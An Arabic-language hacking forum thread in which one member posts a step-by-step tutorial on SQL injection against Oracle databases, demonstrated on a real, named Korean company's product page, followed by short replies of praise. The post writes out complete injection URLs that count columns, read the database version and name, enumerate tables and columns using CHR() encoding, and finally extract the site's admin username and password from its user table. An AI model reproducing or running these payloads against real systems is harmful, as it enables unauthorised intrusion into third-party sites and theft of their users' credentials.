حالة الموضوع:
مغلق
  1. Hiker

    Hiker <span style="font-weight: bold; text-shadow: #BBBB V • I • P

    الأنتساب:
    ‏2 يوليو 2014
    المشاركات:
    23
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    3
    بسم الله الرحمن الرحيم

    السلام عليكم ورحمة الله وبركاتة

    اليوم سنتكلم عن حقن قواعد البيانات الــــ ORACLE

    ان شاء الله

    واقوم بتوضيح الاستعلامات التي نخاطب بها هذا النوع من القواعد ان شاء الله
    وتخطي حيل المبرمجين ونقوم بجلب البيانات المستخرجة حتى وان كانت مخفيه
    وسحاول ابسط الفكره لحقن مثل هذا النوع ان شاء الله نبدأ
    مع العلم هي شبية بحقن قواعد البيانات MySql
    مما يعني طرق التخاطب لا في استعلام الأوامر
    راح انطبق الدرس على هالموقع التالي
    كود PHP:
    http://m.hanilworld.co.kr/product/view.php?mid=PHILEO-914UV
    وبالطريقة الروتينية
    وبوضع سنكل كويتث '
    في نهاية الرابط
    [​IMG]
    كما نلاحظ فالصورة من خلال الخطأ الضاهر لدينا تبين ان لنا نوع القاعده هي ORACLE

    طيب نحدد عدد الأعمده بالاستعلام المعروف
    order by
    امر استعلام واضح
    وبالطريقة التقليديه يعني نضل نقلل ليما يختفي الخطأ عندها حددنا عدد الاعمده
    بعد ما حددنا عدد الاعمدة وهي 4

    هنا نقوم بتحديد العمود المصاب عن طريق الاستعلام
    union select
    هنا ما راح نكتب عدد الاعمده بقيمه رقميه راح نعوض عن كل عمود بقيمه فارغه اي نصيه
    اي
    1 = null
    وهكذا
    يعني الاستعلام يكون بهذا الشكل
    كود PHP:
    union select null,null,null,null 
    مع الحاق نهايه الحقنه بالأمر الآتي
    كود PHP:
    from%20v$version من اصدار القاعدة هنا ارفقنا هذا الامر لنتعرف على الاعمده المصابه لستكمال استغلالنا
    لنحصل على ما نريد من معلومات
    طيب الاستعلام يصبح بهذا الشكل
    كود PHP:
    http://m.hanilworld.co.kr/product/view.php?mid=-PHILEO-914UV%27%20union%20select%20NULL,NULL,NULL,NULL%20from%20v$version+--+
    لو تلاحظ في الصفحى تبع الموقع ماظهرت اي معلومات او عمود مصاب
    طيب في طريقه لأظهار الاعمده بالصفحة نشوف كيفية استخراج الأعمد المصابة
    بستبدال القيمه null بــــــــ '1'
    يعني مكان اول قيمه فارغه نستبدلها بــــــــ '1'
    يعني كل قيمه فارغه نستبدلة برقم و وضع كل رقم مابين علامتي تنصيص
    يعني مكان اول قيمه فارغه نستبدله اذا مشت الحقنه وما ضهر خطأ في الصفحه اذن العمود مصاب واذا ضهر خطأ يعني العمود ليس مصاب انخلي قيمه فارغه
    هذه الطريقه استخدمنها لتحديد الاعمده المصابه
    هنا ماشاء الله الاعمده كله مصابه يعني الحقنه راح اتكون على النحو التالي
    كود PHP:
    http://m.hanilworld.co.kr/product/view.php?mid=-PHILEO-914UV%27%20union%20select%20%271%27,%272%27,%273%27,%274%27%20from%20v$version+--+
    لو نلاحظ في صفحة الموقع لم تظهر اي بيانات
    طيب هنا صاحب السكربت مخبئ المعلومات في سورس الصور
    طيب كلك يمين على اي صوره بالصفحه ونذهب كما موضح بالصورة
    [​IMG]
    ستضهر لنا مصدر الصور كما في الصورة
    [​IMG]
    كما نلاحظ الاعمده المصابه هنا مخبأه

    الآن لنتعرف على اصدار القاعدة
    نفس الاستعلام السابق ولكن نضع مكان العمود المصابه الامر
    كود PHP:
    BANNER =  هنا استخدمناه لكي تضهر لنا اصدار القاعده يعني كبصمه لاستخراج  المعلومات في مكان العمود المصاب وهذه خاصة في قواعد الاوراكل
    لاحظ الحقنه
    كود PHP:
    http://m.hanilworld.co.kr/product/view.php?mid=-PHILEO-914UV%27%20union%20select%20%271%27,%272%27,BANNER,%274%27%20from%20v$version+--+
    [​IMG]
    كما نلاحظ الاصدار واضح بالصورة CORE11.1.0.6.0Production

    الآن نستخرج اسم القاعدة عن طريق وضع

    لتصبح الحقنة
    كود PHP:
    http://m.hanilworld.co.kr/product/view.php?mid=-PHILEO-914UV%27%20union%20select%20%271%27,%272%27,SYS.DATABASE_NAME,%274%27%20from%20DUAL+--+
    [​IMG]
    كما موضح فالصورة اسم القاعدة HIMSDB

    الآن ننتقل الى اضهار الجداول والحقول معاَ
    عن طريق الاستعلام التالي

    لتصبح الحقنة بهذا الشكل
    كود PHP:
    http://m.hanilworld.co.kr/product/view.php?mid=-PHILEO-914UV%27%20union%20select%20%271%27,%272%27,%28table_name||chr%2858%29||column_name%29,%274%27%20from%20USER_TAB_COLUMNS+--+
    [​IMG]
    كما نلاحظ في الصورة ضهور اول جدول و أول عمود من قاعدة البيانات

    الآن التنقل الى الجداول البقيه من خلال

    أول جدول ضهر لنا هو AS_FLTR_EXCH_HISY
    بعد ما قمنا بتحويله يصبح
    كود PHP:
    CHR(65) || CHR(83) || CHR(95) || CHR(70) || CHR(76) || CHR(84) ||  CHR(82) || CHR(95) || CHR(69) || CHR(88) || CHR(67) || CHR(72) ||  CHR(95) || CHR(72) || CHR(73) || CHR(83) || CHR(89)
    مع الحاق الحقنة بالامر
    كود PHP:
    Where table_name> = اينما تجد الجدول الفلاني اجلبلي الي بعده او الاكبر منه و هكذا
    لتصبح الحقنه بشكل التالي
    كود PHP:
    http://m.hanilworld.co.kr/product/view.php?mid=-PHILEO-914UV%27%20union%20select%20%271%27,%272%27,%28table_name||chr%2858%29||column_name%29,%274%27%20from%20USER_TAB_COLUMNS%20where%20table_name%3E%20%20CHR%2865%29%20||%20CHR%2883%29%20||%20CHR%2895%29%20||%20CHR%2870%29%20||%20CHR%2876%29%20||%20CHR%2884%29%20||%20CHR%2882%29%20||%20CHR%2895%29%20||%20CHR%2869%29%20||%20CHR%2888%29%20||%20CHR%2867%29%20||%20CHR%2872%29%20||%20CHR%2895%29%20||%20CHR%2872%29%20||%20CHR%2873%29%20||%20CHR%2883%29%20||%20CHR%2889%29+--+
    [​IMG]
    كما نلاحظ الجدول الثاني والعمود الأول لجدول الثاني

    لأستخراج الجداول البقية كما اسردنا سابقاَ
    الآن نختصر الطريقه باستخراج جدول اليوزر لاحظ الحقنة
    كود PHP:
    http://m.hanilworld.co.kr/product/view.php?mid=-PHILEO-914UV%27%20union%20select%20%271%27,%272%27,%28table_name||chr%2858%29||column_name%29,%274%27%20from+USER_TAB_COLUMNS%20where%20table_name%3E%20%20%20CHR%2880%29%20||%20CHR%2876%29%20||%20CHR%2895%29%20||%20CHR%2882%29%20||%20CHR%2869%29%20||%20CHR%2886%29%20||%20CHR%2873%29%20||%20CHR%2869%29%20||%20CHR%2887%29+--+
    [​IMG]
    كما موضح جدول اليوزر مع ضهور اول عمود لجدول اليوزر
    PL_USER = جدول اليوزر
    ADDR_1 = العمود الآول لجدول اليوزر

    الآن نريد التنقل بين الاعمدة لجدول اليوزر
    نضيف الامر التالي بعد الجدول المشفر بقيمة chr
    and column_name> = اجلبلي العمود الي بعدة
    بنفس الكلام الي فوق نحول اسم العمود الى قيمة chr العمود الاول الي استخرجنا من جدول اليوزر هو ADDR_1
    كود PHP:

    CHR
    (65) || CHR(68) || CHR(68) || CHR(82) || CHR(95) || CHR(49)  =  اسم العمود بعد التشفير
    لتصبح الحقنة
    كود PHP:
    http://m.hanilworld.co.kr/product/view.php?mid=-PHILEO-914UV%27%20union%20select%20%271%27,%272%27,%28table_name||chr%2858%29||column_name%29,%274%27%20from+USER_TAB_COLUMNS%20where%20table_name%3E%20%20%20CHR%2880%29%20||%20CHR%2876%29%20||%20CHR%2895%29%20||%20CHR%2882%29%20||%20CHR%2869%29%20||%20CHR%2886%29%20||%20CHR%2873%29%20||%20CHR%2869%29%20||%20CHR%2887%29%20and%20column_name%3E%20%20CHR%2865%29%20||%20CHR%2868%29%20||%20CHR%2868%29%20||%20CHR%2882%29%20||%20CHR%2895%29%20||%20CHR%2849%29+--+
    شوف السورس ضهر ثاني عمود
    نختصر على السريع انا استخرجت عمود اليوزر والباسورد لجدول اليوزر
    لاحظ الحقنه
    هذه لليوزر
    كود PHP:
    http://m.hanilworld.co.kr/product/view.php?mid=-PHILEO-914UV%27%20union%20select%20%271%27,%272%27,%28table_name||chr%2858%29||column_name%29,%274%27%20from+USER_TAB_COLUMNS%20where%20table_name%3E%20%20%20CHR%2880%29%20||%20CHR%2876%29%20||%20CHR%2895%29%20||%20CHR%2882%29%20||%20CHR%2869%29%20||%20CHR%2886%29%20||%20CHR%2873%29%20||%20CHR%2869%29%20||%20CHR%2887%29%20and%20column_name%3E%20%20%20CHR%2885%29%20||%20CHR%2883%29%20||%20CHR%2869%29%20||%20CHR%2882%29%20||%20CHR%2895%29%20||%20CHR%2876%29%20||%20CHR%2869%29%20||%20CHR%2886%29%20||%20CHR%2869%29%20||%20CHR%2876%29+--+
    وهذه للباسورد
    كود PHP:
    http://m.hanilworld.co.kr/product/view.php?mid=-PHILEO-914UV%27%20union%20select%20%271%27,%272%27,%28table_name||chr%2858%29||column_name%29,%274%27%20from+USER_TAB_COLUMNS%20where%20table_name%3E%20%20%20CHR%2880%29%20||%20CHR%2876%29%20||%20CHR%2895%29%20||%20CHR%2882%29%20||%20CHR%2869%29%20||%20CHR%2886%29%20||%20CHR%2873%29%20||%20CHR%2869%29%20||%20CHR%2887%29%20and%20column_name%3E%20%20%20CHR%2885%29%20||%20CHR%2883%29%20||%20CHR%2869%29%20||%20CHR%2882%29%20||%20CHR%2895%29%20||%20CHR%2878%29%20||%20CHR%2879%29+--+
    كما نلاحظ في الصوره
    [​IMG]
    الآن استخراج بيانات الأعمدة لعمود اليوزر والبسورد من جدول اليوزر
    لاحظ الحقنة بشكل النهائي
    كود PHP:
    http://m.hanilworld.co.kr/product/view.php?mid=-PHILEO-914UV%27%20union%20select%20%271%27,%272%27,%28USER_NAME||chr%2858%29||USER_PWD%29,%274%27%20from+PL_USER+--+
    كما نلاحظ في الصورة اليوزر والباسورد للادمن
    [​IMG]
    الى هنا ارجو اني قد وفقت في ايصال المعلومة واسف اذا اخطأت في شي
    واعذروني على الاطالة واي استفسار انا حاضر
    في امان الله
     
    2 شخص معجب بهذا.
  2. HaMaM-HaCkEr

    HaMaM-HaCkEr DeveloPer Plus

    الأنتساب:
    ‏22 نوفمبر 2012
    المشاركات:
    117
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    16
    رد: حقن قواعد البيانات اوراكل وتخطي اخفاء البيانات+ sqli oracle skip hide +

    ماشاء الله عليك موضوع في القمه

    ماذا تعتقد في مشاركة Hiker؟ يعجبني ويستحق التقييم​
     
  3. Hiker

    Hiker <span style="font-weight: bold; text-shadow: #BBBB V • I • P

    الأنتساب:
    ‏2 يوليو 2014
    المشاركات:
    23
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    3
    رد: حقن قواعد البيانات اوراكل وتخطي اخفاء البيانات+ sqli oracle skip hide +

    تسلم اخوي ومنور اي استفسار موجود
    #ٌnًo.
     
  4. m0j4hed

    m0j4hed Developer

    الأنتساب:
    ‏20 يناير 2012
    المشاركات:
    51
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    الإقامة:
    إڪَيدِ فِيَ ﭰـ♥ـڷبڪَ
    رد: حقن قواعد البيانات اوراكل وتخطي اخفاء البيانات+ sqli oracle skip hide +

    ي خي مشاءلله عليك مواضيعك جباره دائماً و تحب تتميز عن غيرك ​
     
  5. ADNAN

    ADNAN Developer

    الأنتساب:
    ‏29 أكتوبر 2012
    المشاركات:
    84
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    الإقامة:
    الأرض
    رد: حقن قواعد البيانات اوراكل وتخطي اخفاء البيانات+ sqli oracle skip hide +

    استاذنا بارك الله فيك
    والله يعطيك العافيه
     
  6. أمير عرش الدموع

    أمير عرش الدموع DeveloPer Plus

    الأنتساب:
    ‏25 يناير 2012
    المشاركات:
    111
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    18
    الإقامة:
    IRAQ
    رد: حقن قواعد البيانات اوراكل وتخطي اخفاء البيانات+ sqli oracle skip hide +

    وعليكم السلام ورحمة الله وبركاته

    يعطيك العافية حبيبي !:"
     
  7. Abo MalaK

    Abo MalaK Developer

    الأنتساب:
    ‏15 يونيو 2012
    المشاركات:
    44
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    رد: حقن قواعد البيانات اوراكل وتخطي اخفاء البيانات+ sqli oracle skip hide +

    يعطيك العافية يا مبدع
     
  8. ( xP )

    ( xP ) DeveloPer Plus

    الأنتساب:
    ‏10 مارس 2012
    المشاركات:
    132
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    18
    الإقامة:
    IQ-TAM
    رد: حقن قواعد البيانات اوراكل وتخطي اخفاء البيانات+ sqli oracle skip hide +

    مشكور اخى الكريم على المجهود الرائع
    رمضان كريم وتقبل الله منا ومنكم
     
  9. zezo the king

    zezo the king Developer

    الأنتساب:
    ‏23 يونيو 2012
    المشاركات:
    8
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    الإقامة:
    امـــــ الدنيـــــــــــــــــــــا
    رد: حقن قواعد البيانات اوراكل وتخطي اخفاء البيانات+ sqli oracle skip hide +

    مشكور يابطل :{y.}
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة